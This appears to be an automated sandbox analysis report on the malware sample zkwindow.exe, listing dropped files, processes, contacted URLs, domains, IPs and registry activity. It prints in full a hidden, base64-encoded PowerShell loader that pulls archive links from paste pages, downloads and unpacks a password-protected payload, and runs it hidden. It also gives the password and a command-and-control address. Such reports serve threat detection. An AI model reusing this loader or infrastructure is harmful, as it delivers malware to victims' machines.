Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
zkwindow.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\7zip\7za.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\ISCmplr.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\isscint.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\vpdcuvm
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\DH_Http\ISCmplr.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\DH_Http\isscint.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7z1900-x64.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\presidio.json
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\tributary.iso
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zbkqbiq.dgd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ltawufd.hkp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3lsgck.3yf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5goga5z.kjz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\a722c6c5
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\b3be1509
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mhpcwjai
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Mar 10 19:40:07
2025, mtime=Mon Mar 10 19:40:15 2025, atime=Fri Mar 7 11:55:00 2025, length=2871768, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp77B5.tmp
|
SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free
pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmpC79B.tmp
|
SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free
pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmpC7EA.tmp
|
SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free
pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\DH_Http\presidio.json
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\DH_Http\tributary.iso
|
data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
There are 19 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\zkwindow.exe
|
"C:\Users\user\Desktop\zkwindow.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAZQB2AGUAbgBaAGkAcABVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnAA0ACgBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAkAHMAZQB2AGUAbgBaAGkAcABaAGkAcABQAGEAdABoACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgAkAHMAZQB2AGUAbgBaAGkAcABQAGEAdABoACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABzAGUAdgBlAG4AWgBpAHAARQB4AHQAcgBhAGMAdABQAGEAdABoACAAIgA3AHoAYQAuAGUAeABlACIADQAKAA0ACgAkAHoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACgAWwBTAHkAcwB0AGUAbQAuAEcAdQBpAGQAXQA6ADoATgBlAHcARwB1AGkAZAAoACkALgBUAG8AUwB0AHIAaQBuAGcAKAAiAE4AIgApACkADQAKACQAegBpAHAAUABhAHMAcwB3AG8AcgBkACAAPQAgACIANQA0ADcAOABmAGgAagBkAEQAUwBIAEoASABEAFMASgBGAEgASgBTAEQAIwBAACQAQAAkACUAXgAjACQAJQBXAEQARgAhACIADQAKACQAcgBhAG4AZABvAG0ARgBvAGwAZABlAHIAIAA9ACAAIgBfACIAIAArACAAKABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIATgAiACkAKQANAAoAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACQAcgBhAG4AZABvAG0ARgBvAGwAZABlAHIADQAKAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJAB6AGkAcABQAGEAdABoACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAdwBoAGkAbABlACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAegBpAHAAUABhAHQAaAApACkAIAB7AA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMADQAKAH0ADQAKAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBlAHYAZQBuAFoAaQBwAFAAYQB0AGgAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAeAAiACwAIgBgACIAJAB6AGkAcABQAGEAdABoAGAAIgAiACwAIgAtAG8AYAAiACQAZQB4AHQAcgBhAGMAdABQAGEAdABoAGAAIgAiACwAIgAtAHAAJAB6AGkAcABQAGEAcwBzAHcAbwByAGQAIgAsACIALQB5ACIAIAAtAFcAYQBpAHQADQAKAHcAaABpAGwAZQAgACgALQBuAG8AdAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGUAeAB0AHIAYQBjAHQAUABhAHQAaAApACkAIAB7AA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMADQAKAH0ADQAKAA0ACgAkAGUAeABlAEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQB4AHQAcgBhAGMAdABQAGEAdABoACAALQBGAGkAbAB0AGUAcgAgACIAKgAuAGUAeABlACIAIAAtAEYAaQBsAGUAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAaQBmACAAKAAkAGUAeABlAEYAaQBsAGUAKQAgAHsADQAKACAAIAAgACAAVQBuAGIAbABvAGMAawAtAEYAaQBsAGUAIAAtAFAAYQB0AGgAIAAkAGUAeABlAEYAaQBsAGUALgBGAHUAbABsAE4AYQBtAGUADQAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANwANAAoAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAeABlAEYAaQBsAGUALgBGAHUAbABsAE4AYQBtAGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA0ACgB9AA==
|
|
|
|
C:\Users\user\AppData\Local\Temp\7zip\7za.exe
|
"C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47"
-p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
|
|
|
|
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
|
"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
|
"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://main-connection.click/Download_StarW3_pack.zip8
|
unknown
|
|
|
|
http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
|
92.255.85.36
|
|
|
|
https://rentry.o
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://pastebin.com/raw/DWCCqGB0
|
unknown
|
||
|
http://www.vmware.com/0
|
unknown
|
||
|
http://repository.certum.pl/cscasha2.cer0
|
unknown
|
||
|
http://ocsp.sectigo.com0
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
https://jrsoftware.org/ismail.phpopenU
|
unknown
|
||
|
https://rentry.org
|
unknown
|
||
|
http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08P
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://rentry.co/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
|
unknown
|
||
|
https://rentry.co/0xf6ea7bf5d089f439ec6e7a131388579d0caa862d4ee0
|
unknown
|
||
|
http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
http://repository.certum.pl/ccsca2021.cer0
|
unknown
|
||
|
https://rentry.org/
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
|
unknown
|
||
|
http://rentry.org
|
unknown
|
||
|
https://rentry.co/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
|
unknown
|
||
|
http://92.255.85.36:9000t-
|
unknown
|
||
|
https://www.remobjects.com/ps
|
unknown
|
||
|
http://subca.ocsp-certum.com02
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
http://subca.ocsp-certum.com01
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.innosetup.com/
|
unknown
|
||
|
https://sectigo.com/CPS0D
|
unknown
|
||
|
http://crl.certum.pl/ctnca2.crl0l
|
unknown
|
||
|
http://repository.certum.pl/ctnca2.cer09
|
unknown
|
||
|
https://jrsoftware.org0
|
unknown
|
||
|
https://jrsoftware.org/
|
unknown
|
||
|
https://jrsoftware.org/isinfo.phpopen
|
unknown
|
||
|
http://92.255.85.36:9000
|
unknown
|
||
|
http://ccsca2021.ocsp-certum.com05
|
unknown
|
||
|
http://www.microsoft.c
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.remobjects.com/psopenU
|
unknown
|
||
|
https://rentry.org/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
|
164.132.58.105
|
||
|
http://www.certum.pl/CPS0
|
unknown
|
||
|
https://cdn4.buysellads.net/pub/rentryorg.js?
|
unknown
|
||
|
https://pastebin.com/raw/DWCCqGB0PO
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://main-connection.click/Download_StarW3_pack.zip
|
188.114.97.3
|
||
|
https://rentry.org/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
|
164.132.58.105
|
||
|
https://sectigo.com/CPS0
|
unknown
|
||
|
http://repository.certum.pl/ctnca.cer09
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://crl.certum.pl/ctnca.crl0k
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://rentry.co/static/icons/512.png
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.vmware.com/0/
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
https://ac.ecosia.org?q=
|
unknown
|
||
|
https://main-connection.click/archive.
|
unknown
|
||
|
https://main-connection.clickp
|
unknown
|
||
|
https://main-connection.click
|
unknown
|
||
|
https://www.certum.pl/CPS0
|
unknown
|
||
|
http://www.symauth.com/cps0(
|
unknown
|
||
|
http://crl.certum.pl/cscasha2.crl0q
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://rentry.co/0xf6ea7bf5d089f439ec6e7010101a88579d0caa862d4ee0
|
unknown
|
||
|
https://main-connection.click/archive.zip
|
188.114.97.3
|
||
|
http://cscasha2.ocsp-certum.com04
|
unknown
|
||
|
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
|
https://www.ecosia.org/newtab/v20
|
unknown
|
||
|
http://main-connection.click
|
unknown
|
||
|
http://www.symauth.com/rpa00
|
unknown
|
||
|
https://duckduckgo.com/chrome_newtabv20
|
unknown
|
||
|
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://jrsoftware.org/isdonate.phpopenj
|
unknown
|
||
|
http://www.info-zip.org/
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://92.255.85.36:
|
unknown
|
||
|
https://www.innosetup.com
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
https://gemini.google.com/app?q=
|
unknown
|
There are 75 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
|
217.20.57.34
|
||
|
rentry.org
|
164.132.58.105
|
||
|
main-connection.click
|
188.114.97.3
|
||
|
pki-goog.l.google.com
|
142.250.184.227
|
||
|
c.pki.goog
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
92.255.85.36
|
unknown
|
Russian Federation
|
|
|
|
164.132.58.105
|
rentry.org
|
France
|
||
|
188.114.97.3
|
main-connection.click
|
European Union
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5950000
|
direct allocation
|
page read and write
|
|
|
|
2DA0000
|
direct allocation
|
page read and write
|
|
|
|
1002000
|
unkown
|
page readonly
|
|
|
|
5DBA94C000
|
stack
|
page read and write
|
||
|
27BD000
|
trusted library allocation
|
page read and write
|
||
|
22CAE69D000
|
heap
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
7FFC3DA30000
|
trusted library allocation
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7FFC3DA90000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
D84000
|
unkown
|
page read and write
|
||
|
A3C0000
|
unkown
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
54B5000
|
trusted library allocation
|
page read and write
|
||
|
22CC8A0E000
|
heap
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
6CEE000
|
stack
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
22CB0866000
|
trusted library allocation
|
page read and write
|
||
|
2EF4000
|
unkown
|
page read and write
|
||
|
3AB000
|
stack
|
page read and write
|
||
|
5ABF000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3D960000
|
trusted library allocation
|
page read and write
|
||
|
A9F000
|
heap
|
page read and write
